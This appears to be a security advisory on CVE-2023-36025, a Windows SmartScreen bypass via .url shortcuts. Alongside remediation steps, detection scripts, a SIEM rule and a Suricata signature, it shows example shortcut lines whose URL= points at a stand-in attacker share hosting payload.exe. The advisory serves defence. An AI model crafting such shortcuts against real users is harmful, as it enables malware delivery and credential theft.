
CVE-2023-36025: Windows SmartScreen — Security Feature Bypass

CVE Details

CVE ID: CVE-2023-36025
CVSS Score: 8.8
Severity: High
Vendor: Microsoft
Product: Windows SmartScreen
Patch Status: Available
Published: November 14, 2023
EPSS Score: 91.5%
CISA Patch Deadline: December 5, 2023 (federal deadline passed)

Background

Windows SmartScreen is a security feature that warns users when they try to open files downloaded from the internet that aren’t signed by a trusted publisher or haven’t been seen by many users. It’s part of the Mark of the Web (MotW) mechanism — when Windows downloads a file, it tags it with an ADS (Alternate Data Stream) attribute indicating where it came from. SmartScreen checks for this tag before executing files.

SmartScreen bypasses are a recurring theme in Windows exploitation. CVE-2023-36025 was patched in November 2023 and was a zero-day at the time — it was being used in active campaigns before Microsoft had a fix. Unlike some SmartScreen bypasses that require complex setups, this one exploits .url shortcut files, which Windows users encounter regularly.

Technical Mechanism

Internet Shortcut files (.url) are Windows shortcuts that open URLs when double-clicked. When a .url file is downloaded from the internet, it should receive a MotW tag and SmartScreen should warn the user before it executes.

CVE-2023-36025 exploits a flaw in how Windows handles .url files whose URL= entry points to a network share (UNC path) or to certain other URL patterns. A .url file that references a network share path (e.g., URL=\\attacker-ip\share\malware.exe) bypasses the SmartScreen check: Windows doesn’t apply the MotW warning for these shortcut types, even when the shortcut file itself was downloaded from the internet.

The attack flow:

  1. Attacker crafts a malicious .url file with URL=\\attacker-ip\share\payload.exe or similar
  2. File is delivered to target via phishing email or malicious download
  3. Target double-clicks the .url file
  4. SmartScreen check is bypassed — no warning shown
  5. The referenced payload is executed immediately

The bypass is particularly effective because .url files look innocuous (they appear as internet shortcuts with familiar icons), and users are conditioned to expect website URLs, not to recognise malicious UNC paths.

Real-World Exploitation Evidence

Phemedrone Stealer and similar malware families were distributed using CVE-2023-36025 in active campaigns:

  • Phemedrone Stealer — an information stealer that harvests passwords, browser data, cryptocurrency wallets, and system information; distributed via .url files exploiting this bypass
  • DarkGate malware — observed using SmartScreen bypass techniques including CVE-2023-36025 in distribution campaigns
  • Various phishing campaigns — multiple threat actors adopted the bypass for malware delivery shortly after it became public knowledge

Microsoft assessed this as having been exploited before the patch was released, qualifying it as a zero-day.

Impact Assessment

  • Malware execution without user warning — defeats a key user-facing security layer
  • Credential theft — Phemedrone and similar stealers harvest all stored credentials, browser history, and sensitive files
  • Cryptocurrency wallet compromise — stealers specifically target crypto wallets
  • Initial access for ransomware — information stolen via stealers is used to enable follow-on ransomware attacks
  • Widespread reach — the effectiveness depends on user click-through, but given how often phishing succeeds, this is a meaningful amplifier
  • Bypasses corporate controls — organisations that rely on SmartScreen as a security control have that control circumvented

Affected Versions

Product                             | Affected Versions             | Fixed Version
Windows 10 (all supported versions) | Before November 2023 patches  | KB5032189 and related
Windows 11 (all versions)           | Before November 2023 patches  | KB5032190 and related
Windows Server 2019                 | Before November 2023 patches  | KB5032196
Windows Server 2022                 | Before November 2023 patches  | KB5032198

Remediation Steps

  1. Apply November 2023 Patch Tuesday updates (or later cumulative updates)
  2. Verify patch status on all endpoints:
    Get-HotFix | Where-Object {$_.HotFixID -eq "KB5032189"}
  3. Consider Group Policy to restrict execution of .url files from untrusted sources
  4. Configure email security to quarantine .url file attachments — these are rarely needed in business email
  5. Enable enhanced SmartScreen policies via Group Policy:
    • Computer Configuration > Administrative Templates > Windows Components > File Explorer > Configure Windows SmartScreen
  6. Deploy endpoint detection tools that can flag .url files containing UNC paths in email attachments or downloads
  7. User awareness training — train users to be suspicious of .url shortcut files in emails
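Remediation step 6 and the Technical Mechanism section above both turn on one observable: a downloaded Internet Shortcut whose URL= target is a network share rather than a web address. The following Python is an added example for this page, not Microsoft's or any vendor's code. It parses the .url file format and the Zone.Identifier stream that carries the Mark of the Web, and flags shortcuts with UNC or file: targets. The hostnames, paths and sample files are constructed, and the file: check goes one step beyond the page's UNC example because file://host/share also resolves to a UNC path on Windows.

```python
"""Static triage of Internet Shortcut (.url) files for the SmartScreen-bypass
shape described above: a downloaded shortcut (Zone.Identifier says Internet)
whose URL= target is a UNC path or a file: URL instead of a web address.

Added example for this page, not Microsoft's code.  Sample shortcut and ADS
contents are constructed; the share host is a TEST-NET-1 placeholder.
"""
import re
from typing import Dict, Optional

# Zone values written into the Zone.Identifier alternate data stream (MotW).
ZONE_NAMES = {0: "Local machine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}

UNC_RE = re.compile(r"^\\\\[^\\\s]+\\[^\\\s]+")   # \\host\share...
FILE_SCHEME_RE = re.compile(r"^file:", re.IGNORECASE)
WEB_RE = re.compile(r"^https?://", re.IGNORECASE)


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI reader for .url files and Zone.Identifier streams.

    Section and key names are lower-cased, the last duplicate key wins and
    lines before any [section] land in ''.  Hand-written instead of
    configparser so malformed shortcuts (no header, odd duplicates) still parse.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def shortcut_target(url_text: str) -> Optional[str]:
    """URL= value of the [InternetShortcut] section, or None if absent."""
    return parse_ini(url_text).get("internetshortcut", {}).get("url")


def classify_target(target: Optional[str]) -> str:
    if not target:
        return "none"
    if UNC_RE.match(target):
        return "unc"
    if FILE_SCHEME_RE.match(target):
        return "file"      # file://host/share/x also resolves to a UNC path on Windows
    if WEB_RE.match(target):
        return "web"
    return "other"


def zone_id(ads_text: Optional[str]) -> Optional[int]:
    """ZoneId from a Zone.Identifier stream; None when there is no MotW."""
    if ads_text is None:
        return None
    value = parse_ini(ads_text).get("zonetransfer", {}).get("zoneid", "")
    return int(value) if value.isdigit() else None


def assess(url_text: str, ads_text: Optional[str] = None) -> dict:
    """Combine target type and MotW zone into a triage verdict."""
    target = shortcut_target(url_text)
    kind = classify_target(target)
    zone = zone_id(ads_text)
    suspicious = kind in ("unc", "file")
    if suspicious and zone in (3, 4):
        verdict = "block"    # downloaded shortcut pointing at a share: the campaign pattern
    elif suspicious:
        verdict = "review"   # share target but no MotW (e.g. copied from removable media)
    else:
        verdict = "allow"
    return {"target": target, "kind": kind, "zone_id": zone,
            "zone": ZONE_NAMES.get(zone, "unknown") if zone is not None else "no MotW",
            "verdict": verdict}


def assess_file(path: str) -> dict:
    """On NTFS the MotW is the 'Zone.Identifier' stream, opened by appending
    ':Zone.Identifier' to the path; a missing stream means no MotW."""
    with open(path, encoding="utf-8", errors="replace") as f:
        url_text = f.read()
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            ads_text = f.read()
    except OSError:
        ads_text = None
    return assess(url_text, ads_text)


# Constructed samples: a normal web shortcut and one shaped like the campaigns.
BENIGN_URL = "[InternetShortcut]\r\nURL=https://example.com/portal\r\nIconIndex=0\r\n"
UNC_URL = ("[InternetShortcut]\r\nURL=\\\\192.0.2.10\\share\\payload.exe\r\n"
           "IconFile=shell32.dll\r\nIconIndex=3\r\n")
INTERNET_ADS = "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=https://example.net/dl\r\n"

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_URL), ("unc", UNC_URL)):
        print(name, assess(text, INTERNET_ADS))
```

The "review" verdict exists because a share-targeting shortcut without MotW is unusual but not proof of delivery from the internet; assess_file() only reads the stream on NTFS volumes, so on other filesystems every file is assessed as having no MotW.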

Detection Guidance

Endpoint monitoring — look for:

  • .url files downloaded from the internet (browser download events)
  • Execution of processes spawned by the .url shortcut handler (rundll32.exe loading ieframe.dll)
  • Network connections to UNC paths immediately after a .url file is opened

Email security gateway — block or quarantine .url file attachments; very few legitimate business use cases require sending these.

SIEM detection:

process_name = "rundll32.exe" AND command_line CONTAINS "ieframe.dll,OpenURL" AND parent = "explorer.exe"
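The SIEM rule above is a single-event match; the endpoint indicators a few lines earlier also call for the follow-on network connection to a UNC path. The Python below is an added example for this page, not Microsoft's or any vendor's detection content: it evaluates the rule on normalised process-creation events and raises the severity when the same host opens an SMB (TCP 445) session within a short window. The event field names, the RFC 1918 definition of "internal", and the sample telemetry are all assumptions made for the example.

```python
"""Correlate endpoint telemetry for the .url-launch pattern in the Detection
Guidance above: rundll32.exe running ieframe.dll,OpenURL under explorer.exe,
followed within a short window by an outbound SMB (TCP 445) connection from
the same host.

Added example for this page, not Microsoft's or any vendor's detection
content.  The normalised event fields (host, ts, kind, image, cmdline,
parent_image, dst_ip, dst_port) are assumed, 'internal' is assumed to mean
RFC 1918 or loopback, and the sample events are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, List

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SHORTCUT_RE = re.compile(r"openurl\s+(.+)$", re.IGNORECASE)


@dataclass
class Event:
    host: str
    ts: datetime
    kind: str                 # "process" or "network"
    image: str = ""
    cmdline: str = ""
    parent_image: str = ""
    dst_ip: str = ""
    dst_port: int = 0


def is_url_shortcut_launch(e: Event) -> bool:
    """The SIEM rule above, evaluated on a single process-creation event."""
    return (e.kind == "process"
            and e.image.lower().endswith("rundll32.exe")
            and "ieframe.dll,openurl" in e.cmdline.lower()
            and e.parent_image.lower().endswith("explorer.exe"))


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or any(addr in net for net in INTERNAL_NETS)


def is_smb(e: Event) -> bool:
    return e.kind == "network" and e.dst_port == 445


def shortcut_path(cmdline: str) -> str:
    """The .url path rundll32 was asked to open, kept as alert context."""
    m = SHORTCUT_RE.search(cmdline)
    return m.group(1).strip().strip('"') if m else ""


def correlate(events: Iterable[Event], window: timedelta = timedelta(seconds=30)) -> List[dict]:
    """One alert per shortcut launch: 'high' if the same host opened an SMB
    session within the window (external destination recorded for triage),
    'medium' for a launch with no share access seen."""
    evs = sorted(events, key=lambda e: e.ts)
    alerts: List[dict] = []
    for i, launch in enumerate(evs):
        if not is_url_shortcut_launch(launch):
            continue
        alert = {"host": launch.host, "ts": launch.ts, "shortcut": shortcut_path(launch.cmdline),
                 "dst_ip": None, "external": False, "severity": "medium"}
        for nxt in evs[i + 1:]:
            if nxt.ts - launch.ts > window:
                break                      # events are sorted, nothing later can qualify
            if nxt.host == launch.host and is_smb(nxt):
                alert.update(dst_ip=nxt.dst_ip, external=not is_internal(nxt.dst_ip), severity="high")
                break
        alerts.append(alert)
    return alerts


# Constructed sample telemetry (203.0.113.7 and 198.51.100.20 are TEST-NET placeholders).
T0 = datetime(2023, 11, 20, 12, 0, 0)
SAMPLE_EVENTS = [
    Event("WS01", T0, "process", image=r"C:\Windows\System32\rundll32.exe",
          cmdline=r"rundll32.exe C:\Windows\System32\ieframe.dll,OpenURL C:\Users\a\Downloads\invoice.url",
          parent_image=r"C:\Windows\explorer.exe"),
    Event("WS01", T0 + timedelta(seconds=2), "network", dst_ip="203.0.113.7", dst_port=445),
    Event("WS02", T0 + timedelta(minutes=5), "process", image=r"C:\Windows\System32\rundll32.exe",
          cmdline=r"rundll32.exe C:\Windows\System32\ieframe.dll,OpenURL C:\Users\b\Desktop\news.url",
          parent_image=r"C:\Windows\explorer.exe"),
    Event("WS02", T0 + timedelta(minutes=5, seconds=1), "network", dst_ip="198.51.100.20", dst_port=443),
    Event("WS03", T0 + timedelta(minutes=7), "network", dst_ip="10.0.0.5", dst_port=445),  # file server, no launch
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The window is deliberately short: the shortcut handler resolves the share as soon as the file is opened, so a 445 connection minutes later is far more likely to be ordinary file-server traffic than the bypass. Internal SMB destinations still produce a "high" alert (with external=False) because a compromised internal share is possible; the flag is there so triage can prioritise external ones.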

Suricata signature:

# Outbound from the victim to the share the shortcut names; "SMB" at offset 5 covers both the |ff|SMB (SMB1) and |fe|SMB (SMB2/3) protocol headers that follow the 4-byte NetBIOS session header
alert smb $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible CVE-2023-36025 SmartScreen Bypass UNC Request"; flow:established,to_server; content:"SMB"; offset:5; depth:3; classtype:policy-violation; sid:2034015; rev:1;)

Timeline

Date                 | Event
Before November 2023 | CVE-2023-36025 exploited as zero-day in Phemedrone Stealer campaigns
14 November 2023     | Microsoft patches CVE-2023-36025 in November Patch Tuesday
November 2023        | CISA adds to Known Exploited Vulnerabilities catalogue
Late 2023            | Multiple malware families adopt the bypass technique
2024                 | Post-patch exploitation continues on unpatched Windows systems